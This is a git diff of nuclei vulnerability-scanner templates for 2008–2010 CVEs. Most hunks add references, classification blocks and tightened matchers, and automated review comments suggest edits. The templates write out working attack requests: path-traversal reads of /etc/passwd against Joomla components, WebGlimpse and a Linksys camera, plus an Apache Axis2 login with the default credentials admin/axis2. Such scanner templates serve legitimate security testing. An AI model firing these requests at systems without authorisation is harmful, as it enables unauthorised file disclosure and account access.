http://www.securityfocus.com/bid/32670 + - http://secunia.com/advisories/33014 + - http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + shodan-query: http.title:"phpPgAdmin" + tags: cve2008,lfi,phppgadmin requests: - method: GET 
diff --git a/cves/2008/CVE-2008-6080.yaml b/cves/2008/CVE-2008-6080.yaml index d326f80636..7ce462f492 100644 --- a/cves/2008/CVE-2008-6080.yaml +++ b/cves/2008/CVE-2008-6080.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/6809 - https://www.cvedetails.com/cve/CVE-2008-6080 + - http://secunia.com/advisories/32377 + - http://www.securityfocus.com/bid/31877 + classification: + cve-id: CVE-2008-6080 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml index 8d57e5e23a..d63bd5c944 100644 --- a/cves/2008/CVE-2008-6172.yaml +++ b/cves/2008/CVE-2008-6172.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component RWCards 3.0.11 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. reference: - https://www.exploit-db.com/exploits/6817 - https://www.cvedetails.com/cve/CVE-2008-6172 + - http://secunia.com/advisories/32367 + - http://www.securityfocus.com/bid/31892 + classification: + cve-id: CVE-2008-6172 tags: cve,cve2008,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2008/CVE-2008-6222.yaml b/cves/2008/CVE-2008-6222.yaml index 6cb7474f10..c52d791b69 100644 
--- a/cves/2008/CVE-2008-6222.yaml +++ b/cves/2008/CVE-2008-6222.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/6980 - https://www.cvedetails.com/cve/CVE-2008-6222 + - http://secunia.com/advisories/32523 + - http://www.securityfocus.com/bid/32113 + classification: + cve-id: CVE-2008-6222 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-6668.yaml b/cves/2008/CVE-2008-6668.yaml index f034e02349..797fedd504 100644 --- a/cves/2008/CVE-2008-6668.yaml +++ b/cves/2008/CVE-2008-6668.yaml @@ -2,13 +2,17 @@ id: CVE-2008-6668 info: name: nweb2fax <= 0.2.7 Directory Traversal + author: geeknik + severity: high description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php. reference: - https://www.exploit-db.com/exploits/5856 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - author: geeknik - severity: high - tags: nweb2fax,lfi,cve,cve2008 + - http://www.securityfocus.com/bid/29804 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 + classification: + cve-id: CVE-2008-6668 + tags: nweb2fax,lfi,cve,cve2008,traversal requests: - method: GET diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml index 640fdf985f..8201ec2932 100644 --- a/cves/2009/CVE-2009-0545.yaml +++ b/cves/2009/CVE-2009-0545.yaml 
@@ -3,9 +3,15 @@ id: CVE-2009-0545 info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik - description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. - reference: https://www.exploit-db.com/exploits/8023 severity: critical + description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + reference: + - https://www.exploit-db.com/exploits/8023 + - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 + - http://www.zeroshell.net/eng/announcements/ + - http://www.ikkisoft.com/stuff/LC-2009-01.txt + classification: + cve-id: CVE-2009-0545 tags: cve,cve2009,zeroshell,kerbynet,rce requests: @@ -18,3 +24,5 @@ requests: part: body regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/04/18 diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml index 20514f9861..c8fbea6440 100644 --- a/cves/2009/CVE-2009-0932.yaml +++ b/cves/2009/CVE-2009-0932.yaml 
@@ -4,12 +4,15 @@ info: name: Horde - Horde_Image::factory driver Argument LFI author: pikpikcu severity: high - description: | - Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. reference: - https://www.exploit-db.com/exploits/16154 - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 - tags: cve,cve2009,horde,lfi + - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5 + - http://secunia.com/advisories/33695 + classification: + cve-id: CVE-2009-0932 + tags: cve,cve2009,horde,lfi,traversal requests: - method: GET @@ -21,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 36ff315c20..d614f881cd 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 + - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301 + - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php + classification: + cve-id: CVE-2009-1151 tags: cve,cve2009,phpmyadmin,rce,deserialization requests: diff --git a/cves/2009/CVE-2009-1496.yaml b/cves/2009/CVE-2009-1496.yaml index b915fc3ad0..96796ca27b 100644 --- a/cves/2009/CVE-2009-1496.yaml +++ b/cves/2009/CVE-2009-1496.yaml 
@@ -8,6 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/8367 - https://www.cvedetails.com/cve/CVE-2009-1496 + - http://www.securityfocus.com/bid/34431 + classification: + cve-id: CVE-2009-1496 tags: cve,cve2009,joomla,lfi requests: @@ -20,7 +23,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml index 9141371d04..c70f6219f8 100644 --- a/cves/2009/CVE-2009-1558.yaml +++ b/cves/2009/CVE-2009-1558.yaml @@ -5,8 +5,14 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. - reference: https://www.exploit-db.com/exploits/32954 - tags: cve,cve2009,iot,lfi + reference: + - https://www.exploit-db.com/exploits/32954 + - http://www.securityfocus.com/bid/34713 + - http://www.vupen.com/english/advisories/2009/1173 + - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ + classification: + cve-id: CVE-2009-1558 + tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal requests: - method: GET @@ -17,7 +23,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml index 2020a26398..2d24e45838 100644 --- a/cves/2009/CVE-2009-1872.yaml +++ b/cves/2009/CVE-2009-1872.yaml 
@@ -8,6 +8,13 @@ info: reference: - https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 + - http://www.adobe.com/support/security/bulletins/apsb09-12.html + - http://www.dsecrg.com/pages/vul/show.php?id=122 + classification: + cve-id: CVE-2009-1872 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + verified: "true" tags: cve,cve2009,adobe,xss,coldfusion requests: diff --git a/cves/2009/CVE-2009-2015.yaml b/cves/2009/CVE-2009-2015.yaml index 372820389d..3900e491b5 100644 --- a/cves/2009/CVE-2009-2015.yaml +++ b/cves/2009/CVE-2009-2015.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/8898 - https://www.cvedetails.com/cve/CVE-2009-2015 + - http://www.securityfocus.com/bid/35259 + - http://www.vupen.com/english/advisories/2009/1530 + classification: + cve-id: CVE-2009-2015 tags: cve,cve2009,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2009/CVE-2009-2100.yaml b/cves/2009/CVE-2009-2100.yaml index db846d97e7..0b560673c6 100644 --- a/cves/2009/CVE-2009-2100.yaml +++ b/cves/2009/CVE-2009-2100.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/8946 - https://www.cvedetails.com/cve/CVE-2009-2100 + - http://www.securityfocus.com/bid/35378 + - http://osvdb.org/55176 + classification: + cve-id: CVE-2009-2100 tags: cve,cve2009,joomla,lfi requests: @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-3053.yaml b/cves/2009/CVE-2009-3053.yaml index 3a0a3a1739..7377bc684f 100644 --- a/cves/2009/CVE-2009-3053.yaml +++ b/cves/2009/CVE-2009-3053.yaml 
@@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/9564 - https://www.cvedetails.com/cve/CVE-2009-3053 + - http://www.securityfocus.com/bid/36207 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 + classification: + cve-id: CVE-2009-3053 tags: cve,cve2009,joomla,lfi requests: @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml index 957a9932a2..2e1f8c8283 100644 --- a/cves/2009/CVE-2009-3318.yaml +++ b/cves/2009/CVE-2009-3318.yaml @@ -8,6 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/9706 - https://www.cvedetails.com/cve/CVE-2009-3318 + - http://www.securityfocus.com/bid/36441 + classification: + cve-id: CVE-2009-3318 tags: cve,cve2009,joomla,lfi requests: @@ -20,8 +23,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-4202.yaml b/cves/2009/CVE-2009-4202.yaml index 33b3f6694d..95e235cf67 100644 --- a/cves/2009/CVE-2009-4202.yaml +++ b/cves/2009/CVE-2009-4202.yaml @@ -8,7 +8,11 @@ info: reference: - https://www.exploit-db.com/exploits/8870 - https://www.cvedetails.com/cve/CVE-2009-4202 - tags: cve,cve2009,joomla,lfi + - http://www.vupen.com/english/advisories/2009/1494 + - http://www.securityfocus.com/bid/35201 + classification: + cve-id: CVE-2009-4202 + tags: cve,cve2009,joomla,lfi,photo requests: - method: GET @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml index c28fd9c671..f6cfc51ae8 100644 --- a/cves/2009/CVE-2009-4223.yaml +++ b/cves/2009/CVE-2009-4223.yaml 
@@ -2,12 +2,16 @@ id: CVE-2009-4223 info: name: KR-Web <= 1.1b2 RFI + author: geeknik + severity: high description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 - author: geeknik - severity: high + - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395 + - http://www.exploit-db.com/exploits/10216 + classification: + cve-id: CVE-2009-4223 tags: cve,cve2009,krweb,rfi requests: diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml index 10596c502d..5f63aae9d3 100644 --- a/cves/2009/CVE-2009-4679.yaml +++ b/cves/2009/CVE-2009-4679.yaml @@ -5,10 +5,14 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/33440 - https://www.cvedetails.com/cve/CVE-2009-4679 - tags: cve,cve2009,joomla,lfi + - http://secunia.com/advisories/37760 + - http://www.osvdb.org/61382 + classification: + cve-id: CVE-2009-4679 + tags: cve,cve2009,joomla,lfi,nexus requests: - method: GET @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml new file mode 100644 index 0000000000..53060c8ed3 --- /dev/null +++ b/cves/2009/CVE-2009-5020.yaml 
@@ -0,0 +1,31 @@
+id: CVE-2009-5020
+
+info:
+ name: AWStats < 6.95 - Open Redirect
+ author: pdteam
+ severity: medium
+ description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-5020
+ - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2009-5020
+ cwe-id: CWE-601
+ tags: cve,cve2020,redirect,awstats
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/awstats/awredir.pl?url=example.com'
+ - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
+ stop-at-first-match: true
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/02/13
diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml
index b286f395e1..6f41634201 100644
--- a/cves/2009/CVE-2009-5114.yaml
+++ b/cves/2009/CVE-2009-5114.yaml
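Review bot: The `tags:` line of the new CVE-2009-5020 template reads `cve,cve2020,redirect,awstats`, but the template id and `cve-id` are CVE-2009-5020, so the year tag is wrong; it should be `tags: cve,cve2009,redirect,awstats` so tag-based template selection puts this file in the right year bucket.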
@@ -4,24 +4,27 @@ info: name: WebGlimpse 2.18.7 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. reference: - https://www.exploit-db.com/exploits/36994 - https://www.cvedetails.com/cve/CVE-2009-5114 + - http://websecurity.com.ua/2628/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2009-5114 tags: cve,cve2009,lfi requests: - method: GET path: - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0157.yaml b/cves/2010/CVE-2010-0157.yaml index 84ce7e02b3..4be62d0cfa 100644 --- a/cves/2010/CVE-2010-0157.yaml +++ b/cves/2010/CVE-2010-0157.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_biblestudy - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. reference: - https://www.exploit-db.com/exploits/10943 - https://www.cvedetails.com/cve/CVE-2010-0157 + - http://secunia.com/advisories/37896 + - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0157 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0219.yaml b/cves/2010/CVE-2010-0219.yaml new file mode 100644 index 0000000000..1599e7084c --- /dev/null +++ b/cves/2010/CVE-2010-0219.yaml 
@@ -0,0 +1,53 @@ +id: CVE-2010-0219 + +info: + name: Apache Axis2 Default Login + author: pikpikcu + severity: high + description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 + - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - http://www.vupen.com/english/advisories/2010/2673 + classification: + cve-id: CVE-2010-0219 + metadata: + shodan-query: http.html:"Apache Axis" + tags: cve,cve2010,axis,apache,default-login,axis2 + +requests: + - raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + + payloads: + username: + - admin + password: + - axis2 + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml index 6bb7060bae..1ce0e2d08e 100644 --- a/cves/2010/CVE-2010-0467.yaml +++ b/cves/2010/CVE-2010-0467.yaml @@ -4,29 +4,30 @@ info: name: Joomla! Component CCNewsLetter - Local File Inclusion author: daffainfo severity: medium - description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. - reference: | + description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + reference: - https://www.exploit-db.com/exploits/11282 - https://www.cvedetails.com/cve/CVE-2010-0467 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/37987 + - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html + remediation: Apply all relevant security patches and upgrades. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.80 + cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 + tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml index 66f1da7c88..b659158355 100644 --- a/cves/2010/CVE-2010-0696.yaml +++ b/cves/2010/CVE-2010-0696.yaml 
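Review bot: In the CVE-2010-0219 hunk both raw login POSTs are always sent, because the request block has no `stop-at-first-match: true`, unlike CVE-2009-5020 in the same commit; adding it alongside `payloads` stops the template from submitting the credentials a second time once the first path has matched. The word matcher relies on the default part; writing `part: body` explicitly mirrors the `part: header` style used in CVE-2009-5020 and makes the intent obvious. In this rendering only the bare text `Welcome to Axis2 Web Admin Module !!` of the `words` entry is visible, so confirm that any surrounding markup survived in the committed file.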
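Review bot: In the CVE-2010-0467 hunk `remediation: Apply all relevant security patches and upgrades.` is generic even though the added reference (`ccnewsletter-106-security-release.html`) points at a specific security release; if that page confirms 1.0.6 as the fixed version, `remediation: Upgrade to ccNewsletter 1.0.6 or later.` tells users what to do. Moving `tags` below `classification` matches the key order used by the new templates in this commit, which is the right call for diffability.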
@@ -1,27 +1,31 @@ id: CVE-2010-0696 info: - name: Joomla! Component Jw_allVideos - Arbitrary File Download + name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/11447 - https://www.cvedetails.com/cve/CVE-2010-0696 + - http://secunia.com/advisories/38587 + - http://www.joomlaworks.gr/content/view/77/34/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0696 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0759.yaml b/cves/2010/CVE-2010-0759.yaml index 93c80ee785..3df6950eb6 100644 --- a/cves/2010/CVE-2010-0759.yaml +++ b/cves/2010/CVE-2010-0759.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. reference: - https://www.exploit-db.com/exploits/11498 - https://www.cvedetails.com/cve/CVE-2010-0759 - tags: cve,cve2010,joomla,lfi + - http://secunia.com/advisories/38637 + - http://www.securityfocus.com/bid/38296 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0759 + tags: cve,cve2010,joomla,lfi,plugin requests: - method: GET path: - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0942.yaml b/cves/2010/CVE-2010-0942.yaml index f5d69afbca..cfbd90f032 100644 --- a/cves/2010/CVE-2010-0942.yaml +++ b/cves/2010/CVE-2010-0942.yaml 
@@ -8,20 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/11089 - https://www.cvedetails.com/cve/CVE-2010-0942 + - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0942 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml index 14b6b3f668..8df6ca1a65 100644 --- a/cves/2010/CVE-2010-0943.yaml +++ b/cves/2010/CVE-2010-0943.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. reference: - https://www.exploit-db.com/exploits/11090 - https://www.cvedetails.com/cve/CVE-2010-0943 + - http://www.securityfocus.com/bid/37692 + - http://secunia.com/advisories/33486 + classification: + cve-id: CVE-2010-0943 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml index 075c61c086..e3e41de5b4 100644 --- a/cves/2010/CVE-2010-0944.yaml +++ b/cves/2010/CVE-2010-0944.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_jcollection - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11088 - https://www.cvedetails.com/cve/CVE-2010-0944 + - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt + - http://www.exploit-db.com/exploits/11088 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0944 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0972.yaml b/cves/2010/CVE-2010-0972.yaml index 10db45dc6c..37c142f65b 100644 --- a/cves/2010/CVE-2010-0972.yaml +++ b/cves/2010/CVE-2010-0972.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11738 - https://www.cvedetails.com/cve/CVE-2010-0972 + - http://secunia.com/advisories/38925 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0972 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + 